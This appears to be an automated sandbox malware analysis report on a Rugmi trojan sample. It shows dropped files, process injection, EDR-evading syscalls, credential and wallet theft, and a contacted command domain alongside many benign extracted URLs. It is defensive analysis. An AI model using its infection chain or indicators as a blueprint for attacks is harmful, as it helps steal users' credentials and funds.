C:\Users\user\AppData\Local\Temp\bkpxojga, PE32+ 25->80 dropped 132 Writes to foreign memory regions 25->132 134 Maps a DLL or memory area into another process 25->134 41 conhost.exe 25->41         started        43 LocalCtrl_alpha_v3.exe 25->43         started        96 18.164.96.90, 443, 50032, 50035 MIT-GATEWAYSUS United States 28->96 98 20.110.205.119, 443, 50046 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->98 100 18 other IPs or domains 28->100 file10 signatures11 process12 file13 66 C:\Users\user\AppData\Roaming\...\sqlite.dll, PE32 37->66 dropped 68 C:\Users\user\AppData\Roaming\...\BIB.dll, PE32 37->68 dropped 70 C:\Users\user\AppData\...\AdobeSync.exe, PE32 37->70 dropped 72 3 other files (1 malicious) 37->72 dropped 128 Switches to a custom stack to bypass stack traces 37->128 130 Found direct / indirect Syscall (likely to bypass EDR) 37->130 45 AdobeSync.exe 1 37->45         started        signatures14 process15 signatures16 136 Maps a DLL or memory area into another process 45->136 138 Switches to a custom stack to bypass stack traces 45->138 140 Found direct / indirect Syscall (likely to bypass EDR) 45->140 48 cmd.exe 5 45->48         started        process17 file18 62 C:\Users\user\...\LocalCtrl_alpha_v3.exe, PE32+ 48->62 dropped 64 C:\Users\user\AppData\...\eekxwchdkwfcah, PE32+ 48->64 dropped 104 Writes to foreign memory regions 48->104 106 Found hidden mapped module (file has been removed from disk) 48->106 108 Maps a DLL or memory area into another process 48->108 110 Switches to a custom stack to bypass stack traces 48->110 52 LocalCtrl_alpha_v3.exe 48->52         started        56 conhost.exe 48->56         started        signatures19 process20 dnsIp21 94 tataragirld.site 188.114.97.3, 443, 49967, 49976 CLOUDFLARENETUS European Union 52->94 120 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 52->120 122 Tries to harvest and steal browser information (history, passwords, etc) 52->122 124 Tries to harvest and steal Bitcoin Wallet information 52->124 126 Found direct / indirect Syscall (likely to bypass EDR) 52->126 58 msedge.exe 11 52->58         started        signatures22 process23 process24 60 msedge.exe 58->60         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
LVkAi4PBv6.exe24%ReversingLabsWin32.Trojan.Rugmi

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\PatchReaderWCF\AXE8SharedExpat.dll30%ReversingLabsWin32.Trojan.Generic
C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\PatchReaderWCF\BIB.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcp90.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcr90.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\PatchReaderWCF\sqlite.dll0%ReversingLabs
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dll30%ReversingLabsWin32.Trojan.Generic
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe0%ReversingLabs
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\BIB.dll0%ReversingLabs
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dll0%ReversingLabs
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dll0%ReversingLabs
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dll0%ReversingLabs
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\sqlite.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tataragirld.site/?3d0%Avira URL Cloudsafe
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=00%Avira URL Cloudsafe
http://www.softwareok.de/?Download=Find.Same.Images.OK0%Avira URL Cloudsafe
https://tataragirld.site/2009_New_England_Patriots_season0%Avira URL Cloudsafe
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History0%Avira URL Cloudsafe
https://tataragirld.site/2009_New_England_Patriots_seasono0%Avira URL Cloudsafe
http://www.softwareok.de0%Avira URL Cloudsafe
https://tataragirld.site/0%Avira URL Cloudsafe
https://ntp.msn.comAccess-Control-Allow-Credentials:0%Avira URL Cloudsafe
https://tataragirld.site/g30%Avira URL Cloudsafe
https://ntp.msn.comcache-control:public0%Avira URL Cloudsafe
https://sn.com100%Avira URL Cloudmalware
http://www.softwareok.de/?Freeware/Find.Same.Images.OK0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high
    ssl.bingadsedgeextension-prod-europe.azurewebsites.net
    		94.245.104.56
    		truefalse
      		high
      sb.scorecardresearch.com
      		18.244.18.32
      		truefalse
        		high
        tataragirld.site
        		188.114.97.3
        		truefalse
          		unknown
          googlehosted.l.googleusercontent.com
          		142.250.185.129
          		truefalse
            		high
            clients2.googleusercontent.com
            		unknown
            		unknownfalse
              		high
              bzib.nelreports.net
              		unknown
              		unknownfalse
                		high
                assets.msn.com
                		unknown
                		unknownfalse
                  		high
                  c.msn.com
                  		unknown
                  		unknownfalse
                    		high
                    time.windows.com
                    		unknown
                    		unknownfalse
                      		high
                      ntp.msn.com
                      		unknown
                      		unknownfalse
                        		high
                        api.msn.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354404&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                            		high
                            https://sb.scorecardresearch.com/b?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                              		high
                              https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                		high
                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355017&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                  		high
                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355418&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                    		high
                                    https://sb.scorecardresearch.com/b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-banner.cef8d219ef568729016b.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabLocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://login.microsoftonline.com/LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://tataragirld.site/?3dLocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1807247260.0000000000686000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.vmware.com/0AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.softwareok.com/?Freeware/Find.Same.Images.OK/HistoryLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                  		high
                                                  https://msn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.d639c3da7a2212403887.jsdd1.jsX8/LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.softwareok.com/?Freeware/Find.Same.Images.OKLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                        		high
                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/sports-info-utils.29760dcceee65375ee3c.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://assets.msn.com/bundles/v1/edgeChromium/latest/widgets-region.c1e1084e1dda349af13e.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dns.sb/privacy/CharLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/common.13d268863c97be5f5fe9.js5.47LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js47LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://public.dns.iij.jp/LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://deff.nelreports.net/api/report?cat=msnLocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://assets.msn.com/bundles/v1/edgeChromium/latest/widgets-region.c1e1084e1dda349af13e.js17.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.0c056f3a2106f33fad55.LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js7LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/LessFeedDark.svgLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-bannLocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-service.ed830cd8bd50d3a81f7d.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-service.ed830cd8bd50d3a81f7d.jsomLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://doh.cox.net/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://assets.msn.com/bundles/v1/edgeChromium/latest/common.13d268863c97be5f5fe9.jsf300f31.js160.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.nic.cz/odvr/LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svgLocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_topics-shared-state_dist_TopicData_connecLocalCtrl_alpha_v3.exe, 00000009.00000003.2032787209.0000000002E92000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_jLocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.softwareok.deAdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401E0000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://assets.msn.com/bundles/v1/edgeChromium/latest/common.13d268863c97be5f5fe9.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.clarity.msLocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.softwareok.de/?Freeware/Find.Same.Images.OK/HistoryLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://msn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.softwareok.com/?Download=Find.Same.Images.OKLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                            		high
                                                                                                            http://e5.o.lencr.org0LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/common-settings-edgenext.2aca53164d1cd4b72160.LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKLocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://tataragirld.site/2009_New_England_Patriots_seasonLocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/PartlyCloudyLocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://ntp.msn.com/edge/ntp?locale=en-GB&title=NewLocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://nextdns.io/privacyLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.softwareok.de/?Download=Find.Same.Images.OKLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://img.s-msn.com/tenant/amp/entityid/BB1msB1PLast-Modified:LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://ntp.msn.comAccess-Control-Allow-Credentials:LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://nextdns.io/privacyrLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://assets.msn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://dns.quad9.net/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.ecosia.org/newtab/LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.symauth.com/cps0(AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://tataragirld.site/LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.0000000000686000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://tataragirld.site/g3LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.0000000000686000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.334afafb1912a9f141aa.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.symauth.com/rpa00AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/welcomeGreetingLight.d9ab3d372321b5935217.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.msn.com/web-notification-icon-light.pngLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2005803456.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007F73000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2059495533.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007F6F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
